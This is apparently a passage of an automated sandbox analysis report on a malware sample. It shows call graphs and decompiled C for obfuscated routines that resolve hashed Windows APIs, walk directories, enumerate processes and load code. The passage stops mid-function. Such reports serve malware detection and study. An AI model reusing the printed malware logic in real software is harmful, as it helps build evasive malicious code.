20b2f6a HttpSendRequestW 22561->22566 22562 20b2d20 InternetCloseHandle 22562->22566 22564 20b4220 GetPEB 22564->22566 22565 20b3460 GetPEB 22565->22566 22566->22557 22566->22558 22566->22560 22566->22561 22566->22562 22566->22564 22566->22565 22568 20b3dd0 GetPEB 22566->22568 22570 20b3e70 GetPEB 22566->22570 22566->22571 22572 20b2c58 ObtainUserAgentString 22566->22572 22597 20b5620 GetPEB 22566->22597 22598 20b4180 GetPEB 22566->22598 22599 20b3400 GetPEB 22566->22599 22600 20b2930 GetPEB 22566->22600 22567 20b2f9f 22602 20b3dd0 GetPEB 22567->22602 22568->22566 22570->22566 22571->22521 22572->22566 22576->22521 22577->22521 22578->22521 22579->22521 22580->22521 22581->22521 22582->22521 22583->22523 22584->22503 22585->22498 22586->22515 22587->22507 22588->22527 22589->22538 22590->22535 22591->22543 22592->22546 22593->22549 22594->22547 22595->22553 22596->22555 22597->22566 22598->22566 22599->22566 22600->22566 22601->22567 22602->22571

                                                                                                      Executed Functions

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 95 2091030-2091075 LoadLibraryW GetProcAddress call 2091b30 98 209107e-209108f 95->98 99 2091077-2091079 95->99 101 2091091-209109e SetLastError 98->101 102 20910a3-20910be call 2091b30 98->102 100 209148d-2091490 99->100 101->100 105 20910c0-20910c2 102->105 106 20910c7-20910dc 102->106 105->100 107 20910de-20910eb SetLastError 106->107 108 20910f0-20910fd 106->108 107->100 109 20910ff-209110c SetLastError 108->109 110 2091111-209111a 108->110 109->100 111 209111c-2091129 SetLastError 110->111 112 209112e-209114f 110->112 111->100 113 2091163-209116d 112->113 114 209116f-2091176 113->114 115 20911a5-20911d5 GetNativeSystemInfo call 20918d0 * 2 113->115 116 2091178-2091184 114->116 117 2091186-2091192 114->117 126 20911e9-209120c call 2091800 115->126 127 20911d7-20911e4 SetLastError 115->127 119 2091195-209119b 116->119 117->119 121 209119d-20911a0 119->121 122 20911a3 119->122 121->122 122->113 129 209123d-2091255 GetProcessHeap RtlAllocateHeap 126->129 130 209120e-209121f call 2091800 126->130 127->100 131 209127b-2091291 129->131 132 2091257-2091276 SetLastError 129->132 133 2091222-209122c 130->133 134 209129c 131->134 135 2091293-209129a 131->135 132->100 133->129 136 209122e-2091238 SetLastError 133->136 138 20912a3-2091300 call 2091b30 134->138 135->138 136->100 141 2091302 138->141 142 2091307-2091370 call 2091800 call 2091980 call 2091b50 138->142 143 209147f-209148b call 20916c0 141->143 151 2091372 142->151 152 2091377-2091388 142->152 143->100 151->143 153 209138a-20913a0 call 2092090 152->153 154 20913a2-20913a5 152->154 156 20913ac-20913ba call 20921a0 153->156 154->156 160 20913bc 156->160 161 20913c1-20913c5 call 2091e80 156->161 160->143 163 20913ca-20913cf 161->163 164 20913d1 163->164 165 20913d6-20913e4 call 2092010 163->165 164->143 168 20913eb-20913f4 165->168 169 20913e6 165->169 170 2091470-2091473 168->170 171 20913f6-20913fd 168->171 169->143 172 209147a-209147d 170->172 173 209145d-209146b 171->173 174 20913ff-209145b GetPEB 171->174 172->100 175 209146e 173->175 174->175 175->172
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(02094054,02094040), ref: 02091047
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0209104E
                                                                                                        • Part of subcall function 02091B30: SetLastError.KERNEL32(0000000D,?,02091070,?,00000040), ref: 02091B3D
                                                                                                      • SetLastError.KERNEL32(000000C1), ref: 02091096
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.518992835.0000000002091000.00000020.00000001.sdmp, Offset: 02091000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_2091000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1866314245-0
                                                                                                      • Opcode ID: 3f6b7b31f96435c23d727993a7f66bf6cb5abda991749345d712058cec4bc290
                                                                                                      • Instruction ID: 0408db81d8efd45901fd97e1a34e29ed1c07ea81d184b2d83fddd33352322e2d
                                                                                                      • Opcode Fuzzy Hash: 3f6b7b31f96435c23d727993a7f66bf6cb5abda991749345d712058cec4bc290
                                                                                                      • Instruction Fuzzy Hash: CAF1DAB4E00209EFDB44DF94D994BAEB7B1BF88304F108598E91AAB341D735EA51EF50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 304 20b3890-20b38ab 305 20b38b0-20b38b5 304->305 306 20b38bb 305->306 307 20b3a09-20b3a0e 305->307 310 20b38c1-20b38c6 306->310 311 20b3b10-20b3b17 306->311 308 20b3a6c-20b3a7f call 20b3460 307->308 309 20b3a10-20b3a15 307->309 332 20b3a9c-20b3ab7 308->332 333 20b3a81-20b3a97 call 20b3e70 call 20b3dd0 308->333 312 20b3a17-20b3a1e 309->312 313 20b3a56-20b3a5b 309->313 317 20b38cc-20b38d1 310->317 318 20b39c1-20b39c8 310->318 314 20b3b19-20b3b2f call 20b3e70 call 20b3dd0 311->314 315 20b3b34-20b3b35 FindClose 311->315 319 20b3a3b-20b3a51 FindNextFileW 312->319 320 20b3a20-20b3a36 call 20b3e70 call 20b3dd0 312->320 313->305 324 20b3a61-20b3a6b 313->324 314->315 325 20b3b37-20b3b41 315->325 327 20b39b7-20b39bc 317->327 328 20b38d7-20b38dc 317->328 322 20b39ca-20b39e0 call 20b3e70 call 20b3dd0 318->322 323 20b39e5-20b39f9 FindFirstFileW 318->323 319->305 320->319 322->323 323->325 335 20b39ff-20b3a04 323->335 327->305 328->313 334 20b38e2-20b38e7 328->334 353 20b3ab9-20b3acf call 20b3e70 call 20b3dd0 332->353 354 20b3ad4-20b3adf 332->354 333->332 340 20b38ed-20b38f3 334->340 341 20b3991-20b39b2 334->341 335->305 343 20b38f5-20b38fd 340->343 344 20b3914-20b3916 340->344 341->305 350 20b38ff-20b3903 343->350 351 20b390d-20b3912 343->351 344->351 352 20b3918-20b392b call 20b3460 344->352 350->344 359 20b3905-20b390b 350->359 351->305 365 20b3948-20b3978 call 20b3890 352->365 366 20b392d-20b3943 call 20b3e70 call 20b3dd0 352->366 353->354 368 20b3afc-20b3b0b 354->368 369 20b3ae1-20b3af7 call 20b3e70 call 20b3dd0 354->369 359->344 359->351 380 20b397d-20b398c call 20b3400 365->380 366->365 368->305 369->368 380->305
                                                                                                      C-Code - Quality: 73%
                                                                                                      			E020B3890(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                      				short _v524;
                                                                                                      				char _v1044;
                                                                                                      				short _v1588;
                                                                                                      				intOrPtr _v1590;
                                                                                                      				struct _WIN32_FIND_DATAW _v1636;
                                                                                                      				void* _v1640;
                                                                                                      				intOrPtr _v1652;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t22;
                                                                                                      				intOrPtr* _t24;
                                                                                                      				intOrPtr* _t26;
                                                                                                      				intOrPtr* _t28;
                                                                                                      				signed int _t34;
                                                                                                      				int _t40;
                                                                                                      				void* _t44;
                                                                                                      				signed int _t48;
                                                                                                      				intOrPtr* _t52;
                                                                                                      				intOrPtr _t57;
                                                                                                      				void* _t58;
                                                                                                      				void* _t93;
                                                                                                      				void* _t94;
                                                                                                      				void* _t95;
                                                                                                      				void* _t96;
                                                                                                      				void* _t97;
                                                                                                      				void* _t98;
                                                                                                      				void* _t100;
                                                                                                      
                                                                                                      				_t93 = __ecx;
                                                                                                      				_t97 = __edx;
                                                                                                      				_v1640 = __ecx;
                                                                                                      				_t22 = 0x60b2083;
                                                                                                      				_t58 = _v1640;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t100 = _t22 - 0xd2b506a;
                                                                                                      					if(_t100 > 0) {
                                                                                                      						break;
                                                                                                      					}
                                                                                                      					if(_t100 == 0) {
                                                                                                      						if( *0x20bde50 == 0) {
                                                                                                      							 *0x20bde50 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0x845670b3, _t97);
                                                                                                      						}
                                                                                                      						_t40 = FindClose(_t58); // executed
                                                                                                      						return _t40;
                                                                                                      					}
                                                                                                      					if(_t22 == 0x14d466) {
                                                                                                      						if( *0x20be320 == 0) {
                                                                                                      							 *0x20be320 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0xd5cde728, _t97);
                                                                                                      						}
                                                                                                      						_t44 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                                                                      						_t58 = _t44;
                                                                                                      						if(_t58 == 0xffffffff) {
                                                                                                      							return _t44;
                                                                                                      						} else {
                                                                                                      							_t22 = 0x635dcc3;
                                                                                                      							continue;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(_t22 == 0x60b2083) {
                                                                                                      							_t22 = 0x20f09625;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							if(_t22 != 0x635dcc3) {
                                                                                                      								L27:
                                                                                                      								if(_t22 != 0xf0a8a83) {
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									return _t22;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                                                                      									_t48 = _a4( &_v1636, _a8);
                                                                                                      									asm("sbb eax, eax");
                                                                                                      									_t22 = ( ~_t48 & 0x2a8f2359) + 0xd2b506a;
                                                                                                      								} else {
                                                                                                      									if(_v1636.cFileName != 0x2e) {
                                                                                                      										L12:
                                                                                                      										if(_t97 == 0) {
                                                                                                      											goto L11;
                                                                                                      										} else {
                                                                                                      											_t96 = E020B3460(0x20bd310);
                                                                                                      											_t52 =  *0x20bdf10;
                                                                                                      											if(_t52 == 0) {
                                                                                                      												_t52 = E020B3DD0(_t58, E020B3E70(0xe60124ba), 0xec538b3a, _t97);
                                                                                                      												 *0x20bdf10 = _t52;
                                                                                                      											}
                                                                                                      											 *_t52( &_v1044, 0x104, _t96, _t93,  &(_v1636.cFileName));
                                                                                                      											E020B3890( &_v1044, _t97, _a4, _a8);
                                                                                                      											_t98 = _t98 + 0x1c;
                                                                                                      											E020B3400(_t96);
                                                                                                      											_t22 = 0x37ba73c3;
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										_t57 = _v1590;
                                                                                                      										if(_t57 == 0 || _t57 == 0x2e && _v1588 == 0) {
                                                                                                      											L11:
                                                                                                      											_t22 = 0x37ba73c3;
                                                                                                      										} else {
                                                                                                      											goto L12;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      								continue;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					L40:
                                                                                                      				}
                                                                                                      				if(_t22 == 0x20f09625) {
                                                                                                      					_t95 = E020B3460(0x20bd2e0);
                                                                                                      					_t24 =  *0x20bdf10;
                                                                                                      					if(_t24 == 0) {
                                                                                                      						_t24 = E020B3DD0(_t58, E020B3E70(0xe60124ba), 0xec538b3a, _t97);
                                                                                                      						 *0x20bdf10 = _t24;
                                                                                                      					}
                                                                                                      					 *_t24( &_v524, 0x104, _t95, _t93);
                                                                                                      					_t26 =  *0x20bddc8;
                                                                                                      					_t98 = _t98 + 0x10;
                                                                                                      					if(_t26 == 0) {
                                                                                                      						_t26 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0x298e8809, _t97);
                                                                                                      						 *0x20bddc8 = _t26;
                                                                                                      					}
                                                                                                      					_t94 =  *_t26();
                                                                                                      					_t28 =  *0x20bdbec;
                                                                                                      					if(_t28 == 0) {
                                                                                                      						_t28 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0x632f374, _t97);
                                                                                                      						 *0x20bdbec = _t28;
                                                                                                      					}
                                                                                                      					 *_t28(_t94, 0, _t95);
                                                                                                      					_t93 = _v1652;
                                                                                                      					_t22 = 0x14d466;
                                                                                                      					goto L1;
                                                                                                      				} else {
                                                                                                      					if(_t22 != 0x37ba73c3) {
                                                                                                      						goto L27;
                                                                                                      					} else {
                                                                                                      						if( *0x20bdd64 == 0) {
                                                                                                      							 *0x20bdd64 = E020B3DD0(_t58, E020B3E70(0xbb51e2dc), 0xf3180d23, _t97);
                                                                                                      						}
                                                                                                      						_t34 = FindNextFileW(_t58,  &_v1636); // executed
                                                                                                      						asm("sbb eax, eax");
                                                                                                      						_t22 = ( ~_t34 & 0xf90a8c59) + 0xd2b506a;
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				goto L40;
                                                                                                      			}






























                                                                                                      0x020b389a
                                                                                                      0x020b389c
                                                                                                      0x020b389e
                                                                                                      0x020b38a2
                                                                                                      0x020b38a7
                                                                                                      0x020b38b0
                                                                                                      0x020b38b0
                                                                                                      0x020b38b0
                                                                                                      0x020b38b5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b38bb
                                                                                                      0x020b3b17
                                                                                                      0x020b3b2f
                                                                                                      0x020b3b2f
                                                                                                      0x020b3b35
                                                                                                      0x00000000
                                                                                                      0x020b3b35
                                                                                                      0x020b38c6
                                                                                                      0x020b39c8
                                                                                                      0x020b39e0
                                                                                                      0x020b39e0
                                                                                                      0x020b39f2
                                                                                                      0x020b39f4
                                                                                                      0x020b39f9
                                                                                                      0x020b3b41
                                                                                                      0x020b39ff
                                                                                                      0x020b39ff
                                                                                                      0x00000000
                                                                                                      0x020b39ff
                                                                                                      0x020b38cc
                                                                                                      0x020b38d1
                                                                                                      0x020b39b7
                                                                                                      0x00000000
                                                                                                      0x020b38d7
                                                                                                      0x020b38dc
                                                                                                      0x020b3a56
                                                                                                      0x020b3a5b
                                                                                                      0x00000000
                                                                                                      0x020b3a6b
                                                                                                      0x020b3a6b
                                                                                                      0x020b3a6b
                                                                                                      0x020b38e2
                                                                                                      0x020b38e7
                                                                                                      0x020b399d
                                                                                                      0x020b39a6
                                                                                                      0x020b39ad
                                                                                                      0x020b38ed
                                                                                                      0x020b38f3
                                                                                                      0x020b3914
                                                                                                      0x020b3916
                                                                                                      0x00000000
                                                                                                      0x020b3918
                                                                                                      0x020b3922
                                                                                                      0x020b3924
                                                                                                      0x020b392b
                                                                                                      0x020b393e
                                                                                                      0x020b3943
                                                                                                      0x020b3943
                                                                                                      0x020b395c
                                                                                                      0x020b3978
                                                                                                      0x020b397d
                                                                                                      0x020b3982
                                                                                                      0x020b3987
                                                                                                      0x020b3987
                                                                                                      0x020b38f5
                                                                                                      0x020b38f5
                                                                                                      0x020b38fd
                                                                                                      0x020b390d
                                                                                                      0x020b390d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b38fd
                                                                                                      0x020b38f3
                                                                                                      0x00000000
                                                                                                      0x020b38e7
                                                                                                      0x020b38dc
                                                                                                      0x020b38d1
                                                                                                      0x00000000
                                                                                                      0x020b38c6
                                                                                                      0x020b3a0e
                                                                                                      0x020b3a76
                                                                                                      0x020b3a78
                                                                                                      0x020b3a7f
                                                                                                      0x020b3a92
                                                                                                      0x020b3a97
                                                                                                      0x020b3a97
                                                                                                      0x020b3aab
                                                                                                      0x020b3aad
                                                                                                      0x020b3ab2
                                                                                                      0x020b3ab7
                                                                                                      0x020b3aca
                                                                                                      0x020b3acf
                                                                                                      0x020b3acf
                                                                                                      0x020b3ad6
                                                                                                      0x020b3ad8
                                                                                                      0x020b3adf
                                                                                                      0x020b3af2
                                                                                                      0x020b3af7
                                                                                                      0x020b3af7
                                                                                                      0x020b3b00
                                                                                                      0x020b3b02
                                                                                                      0x020b3b06
                                                                                                      0x00000000
                                                                                                      0x020b3a10
                                                                                                      0x020b3a15
                                                                                                      0x00000000
                                                                                                      0x020b3a17
                                                                                                      0x020b3a1e
                                                                                                      0x020b3a36
                                                                                                      0x020b3a36
                                                                                                      0x020b3a41
                                                                                                      0x020b3a45
                                                                                                      0x020b3a4c
                                                                                                      0x00000000
                                                                                                      0x020b3a4c
                                                                                                      0x020b3a15
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 020B39F2
                                                                                                      • FindNextFileW.KERNELBASE(?,?,00000000,0000BD1A,?,00000001), ref: 020B3A41
                                                                                                      • FindClose.KERNELBASE(?), ref: 020B3B35
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID: .$jP+
                                                                                                      • API String ID: 3541575487-2294543394
                                                                                                      • Opcode ID: 62aba54455608884a076cc10aa09650411499db950486a613aee45c2ad6e82b3
                                                                                                      • Instruction ID: 4920664bef6e13f89de4918a0261ab2e3b851fc73ce3cb483bebd3e1ec39952f
                                                                                                      • Opcode Fuzzy Hash: 62aba54455608884a076cc10aa09650411499db950486a613aee45c2ad6e82b3
                                                                                                      • Instruction Fuzzy Hash: 38512474B4830187DB37AB749884AFFB2E6AF85244F3009A9E551C7280EB75DC05AB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 385 20b4bf0-20b4c06 386 20b4c10-20b4c15 385->386 387 20b4c1b 386->387 388 20b4ca5-20b4caa 386->388 389 20b4c8a-20b4ca0 387->389 390 20b4c1d-20b4c22 387->390 391 20b4cac-20b4cb1 388->391 392 20b4cf2-20b4d01 388->392 389->386 393 20b4c4e-20b4c55 390->393 394 20b4c24-20b4c29 390->394 395 20b4cb3-20b4cba 391->395 396 20b4c36-20b4c3b 391->396 397 20b4d03-20b4d1e call 20b3e70 call 20b3dd0 392->397 398 20b4cd7-20b4ced Process32NextW 392->398 404 20b4c72-20b4c7d CreateToolhelp32Snapshot 393->404 405 20b4c57-20b4c6d call 20b3e70 call 20b3dd0 393->405 400 20b4c2b-20b4c30 394->400 401 20b4c47-20b4c4c 394->401 395->398 402 20b4cbc-20b4cd2 call 20b3e70 call 20b3dd0 395->402 396->386 403 20b4c3d-20b4c46 396->403 397->398 398->386 400->396 407 20b4d20-20b4d27 400->407 401->386 402->398 410 20b4c83-20b4c88 404->410 411 20b4d47-20b4d50 404->411 405->404 413 20b4d29-20b4d3f call 20b3e70 call 20b3dd0 407->413 414 20b4d44-20b4d45 FindCloseChangeNotification 407->414 410->386 413->414 414->411
                                                                                                      C-Code - Quality: 85%
                                                                                                      			E020B4BF0(intOrPtr* __ecx, void* __edx) {
                                                                                                      				void* _v556;
                                                                                                      				void* _v560;
                                                                                                      				void* __ebx;
                                                                                                      				void* _t5;
                                                                                                      				signed int _t7;
                                                                                                      				signed int _t16;
                                                                                                      				void* _t20;
                                                                                                      				int _t24;
                                                                                                      				intOrPtr* _t27;
                                                                                                      				void* _t43;
                                                                                                      				void* _t44;
                                                                                                      				void* _t45;
                                                                                                      				void* _t47;
                                                                                                      
                                                                                                      				_t44 = _v560;
                                                                                                      				_t27 = __ecx;
                                                                                                      				_t43 = __edx;
                                                                                                      				_t5 = 0x2261b024;
                                                                                                      				goto L1;
                                                                                                      				L2:
                                                                                                      				if(_t47 == 0) {
                                                                                                      					_t16 =  *_t27( &_v556, _t43);
                                                                                                      					asm("sbb eax, eax");
                                                                                                      					_t5 = ( ~_t16 & 0x14c3842a) + 0x26b28609;
                                                                                                      					goto L1;
                                                                                                      				} else {
                                                                                                      					if(_t5 == 0x20a12e49) {
                                                                                                      						if( *0x20bdf9c == 0) {
                                                                                                      							 *0x20bdf9c = E020B3DD0(_t27, E020B3E70(0xbb51e2dc), 0xe92cf674, _t45);
                                                                                                      						}
                                                                                                      						_t20 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                      						_t44 = _t20;
                                                                                                      						if(_t44 == 0xffffffff) {
                                                                                                      							return _t20;
                                                                                                      						} else {
                                                                                                      							_t5 = 0x378cfed1;
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(_t5 == 0x2261b024) {
                                                                                                      							_t5 = 0x20a12e49;
                                                                                                      							goto L1;
                                                                                                      						} else {
                                                                                                      							if(_t5 == 0x26b28609) {
                                                                                                      								if( *0x20bde38 == 0) {
                                                                                                      									 *0x20bde38 = E020B3DD0(_t27, E020B3E70(0xbb51e2dc), 0x76fc23ac, _t45);
                                                                                                      								}
                                                                                                      								_t24 = FindCloseChangeNotification(_t44); // executed
                                                                                                      								return _t24;
                                                                                                      							}
                                                                                                      							L6:
                                                                                                      							if(_t5 != 0x257c0cd) {
                                                                                                      								while(1) {
                                                                                                      									L1:
                                                                                                      									_t47 = _t5 - 0x286b9323;
                                                                                                      									if(_t47 <= 0) {
                                                                                                      										goto L2;
                                                                                                      									}
                                                                                                      									goto L14;
                                                                                                      								}
                                                                                                      								goto L2;
                                                                                                      							} else {
                                                                                                      								return _t5;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      				L25:
                                                                                                      				L14:
                                                                                                      				if(_t5 == 0x378cfed1) {
                                                                                                      					_v556 = 0x22c;
                                                                                                      					if( *0x20bdc08 == 0) {
                                                                                                      						 *0x20bdc08 = E020B3DD0(_t27, E020B3E70(0xbb51e2dc), 0x4ea853b9, _t45);
                                                                                                      					}
                                                                                                      					goto L18;
                                                                                                      				} else {
                                                                                                      					if(_t5 != 0x3b760a33) {
                                                                                                      						goto L6;
                                                                                                      					} else {
                                                                                                      						if( *0x20be0ec == 0) {
                                                                                                      							 *0x20be0ec = E020B3DD0(_t27, E020B3E70(0xbb51e2dc), 0xe0d0695a, _t45);
                                                                                                      						}
                                                                                                      						L18:
                                                                                                      						_t7 = Process32NextW(_t44,  &_v556); // executed
                                                                                                      						asm("sbb eax, eax");
                                                                                                      						_t5 = ( ~_t7 & 0x01b90d1a) + 0x26b28609;
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				goto L25;
                                                                                                      			}
















                                                                                                      0x020b4bf8
                                                                                                      0x020b4bfc
                                                                                                      0x020b4bff
                                                                                                      0x020b4c01
                                                                                                      0x020b4c06
                                                                                                      0x020b4c1b
                                                                                                      0x020b4c1b
                                                                                                      0x020b4c90
                                                                                                      0x020b4c94
                                                                                                      0x020b4c9b
                                                                                                      0x00000000
                                                                                                      0x020b4c1d
                                                                                                      0x020b4c22
                                                                                                      0x020b4c55
                                                                                                      0x020b4c6d
                                                                                                      0x020b4c6d
                                                                                                      0x020b4c76
                                                                                                      0x020b4c78
                                                                                                      0x020b4c7d
                                                                                                      0x020b4d50
                                                                                                      0x020b4c83
                                                                                                      0x020b4c83
                                                                                                      0x00000000
                                                                                                      0x020b4c83
                                                                                                      0x020b4c24
                                                                                                      0x020b4c29
                                                                                                      0x020b4c47
                                                                                                      0x00000000
                                                                                                      0x020b4c2b
                                                                                                      0x020b4c30
                                                                                                      0x020b4d27
                                                                                                      0x020b4d3f
                                                                                                      0x020b4d3f
                                                                                                      0x020b4d45
                                                                                                      0x00000000
                                                                                                      0x020b4d45
                                                                                                      0x020b4c36
                                                                                                      0x020b4c3b
                                                                                                      0x020b4c10
                                                                                                      0x020b4c10
                                                                                                      0x020b4c10
                                                                                                      0x020b4c15
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b4c15
                                                                                                      0x00000000
                                                                                                      0x020b4c46
                                                                                                      0x020b4c46
                                                                                                      0x020b4c46
                                                                                                      0x020b4c3b
                                                                                                      0x020b4c29
                                                                                                      0x020b4c22
                                                                                                      0x00000000
                                                                                                      0x020b4ca5
                                                                                                      0x020b4caa
                                                                                                      0x020b4cf7
                                                                                                      0x020b4d01
                                                                                                      0x020b4d19
                                                                                                      0x020b4d19
                                                                                                      0x00000000
                                                                                                      0x020b4cac
                                                                                                      0x020b4cb1
                                                                                                      0x00000000
                                                                                                      0x020b4cb3
                                                                                                      0x020b4cba
                                                                                                      0x020b4cd2
                                                                                                      0x020b4cd2
                                                                                                      0x020b4cd7
                                                                                                      0x020b4cdd
                                                                                                      0x020b4ce1
                                                                                                      0x020b4ce8
                                                                                                      0x00000000
                                                                                                      0x020b4ce8
                                                                                                      0x020b4cb1
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 020B4C76
                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 020B4CDD
                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 020B4D45
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ChangeCloseCreateFindNextNotificationProcess32SnapshotToolhelp32
                                                                                                      • String ID: 3v;
                                                                                                      • API String ID: 1306606082-102972113
                                                                                                      • Opcode ID: 89da6cbb59e46b4aea94e84d6eb88fc8b246b1f0c3be1fe9370ae4d8dc0a1f6d
                                                                                                      • Instruction ID: 301e9fa0ef7bcefebfd5a945c3b5129a419a81fbb961433ee97ff92dcef55ebf
                                                                                                      • Opcode Fuzzy Hash: 89da6cbb59e46b4aea94e84d6eb88fc8b246b1f0c3be1fe9370ae4d8dc0a1f6d
                                                                                                      • Instruction Fuzzy Hash: 4A315C31B0030187E7BB9A78A4F53FE61C67F80605F204D36E511C7382E638CE949B62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 440 20b2580-20b258c 441 20b2590-20b2596 440->441 442 20b2789-20b278f 441->442 443 20b259c 441->443 446 20b289a-20b28a0 442->446 447 20b2795 442->447 444 20b274d-20b2755 443->444 445 20b25a2-20b25a8 443->445 450 20b2757-20b276f call 20b3e70 call 20b3dd0 444->450 451 20b2775-20b2784 444->451 448 20b268a-20b2690 445->448 449 20b25ae 445->449 452 20b27af-20b27b5 446->452 453 20b28a6-20b28ad 446->453 454 20b279b-20b27a1 447->454 455 20b2845-20b284d 447->455 457 20b26f3-20b26fa 448->457 458 20b2692-20b2698 448->458 459 20b264c-20b2654 449->459 460 20b25b4-20b25ba 449->460 450->451 451->441 452->441 456 20b27bb-20b27c2 452->456 464 20b28ca-20b28d5 453->464 465 20b28af-20b28c5 call 20b3e70 call 20b3dd0 453->465 466 20b27c3-20b27cb 454->466 467 20b27a3-20b27a9 454->467 461 20b284f-20b2867 call 20b3e70 call 20b3dd0 455->461 462 20b286d-20b287e 455->462 474 20b26fc-20b2712 call 20b3e70 call 20b3dd0 457->474 475 20b2717-20b2748 CryptDecodeObjectEx 457->475 458->452 469 20b269e-20b26a6 458->469 478 20b2656-20b266e call 20b3e70 call 20b3dd0 459->478 479 20b2674-20b2685 459->479 472 20b25fe-20b2605 460->472 473 20b25bc-20b25c2 460->473 461->462 495 20b2883-20b2895 462->495 502 20b28f2-20b2903 464->502 503 20b28d7-20b28ed call 20b3e70 call 20b3dd0 464->503 465->464 470 20b27eb-20b2801 466->470 471 20b27cd-20b27e5 call 20b3e70 call 20b3dd0 466->471 467->452 468 20b291a-20b2920 call 20b4180 467->468 507 20b2925-20b292c 468->507 483 20b26a8-20b26c0 call 20b3e70 call 20b3dd0 469->483 484 20b26c6-20b26d9 469->484 504 20b2806-20b281d 470->504 471->470 489 20b2622-20b2635 472->489 490 20b2607-20b261d call 20b3e70 call 20b3dd0 472->490 473->452 486 20b25c8-20b25cf 473->486 474->475 475->441 478->479 479->441 483->484 516 20b26dc-20b26ee 484->516 500 20b25ec-20b25fc 486->500 501 20b25d1-20b25e7 call 20b3e70 call 20b3dd0 486->501 521 20b263a-20b263c 489->521 490->489 495->441 500->441 501->500 502->507 540 20b2905-20b290a 502->540 503->502 517 20b283a-20b2840 504->517 518 20b281f-20b2835 call 20b3e70 call 20b3dd0 504->518 516->441 517->452 518->517 533 20b290f-20b2919 521->533 534 20b2642-20b2647 521->534 534->441 540->441
                                                                                                      C-Code - Quality: 56%
                                                                                                      			E020B2580(intOrPtr* __ecx) {
                                                                                                      				char _v4;
                                                                                                      				char _v8;
                                                                                                      				intOrPtr _v32;
                                                                                                      				intOrPtr _t16;
                                                                                                      				intOrPtr* _t20;
                                                                                                      				signed int _t21;
                                                                                                      				intOrPtr _t23;
                                                                                                      				signed int _t25;
                                                                                                      				intOrPtr _t28;
                                                                                                      				intOrPtr* _t32;
                                                                                                      				intOrPtr* _t33;
                                                                                                      				intOrPtr* _t35;
                                                                                                      				intOrPtr* _t37;
                                                                                                      				intOrPtr* _t39;
                                                                                                      				signed int _t43;
                                                                                                      				intOrPtr* _t49;
                                                                                                      				void* _t60;
                                                                                                      				intOrPtr* _t62;
                                                                                                      				intOrPtr* _t67;
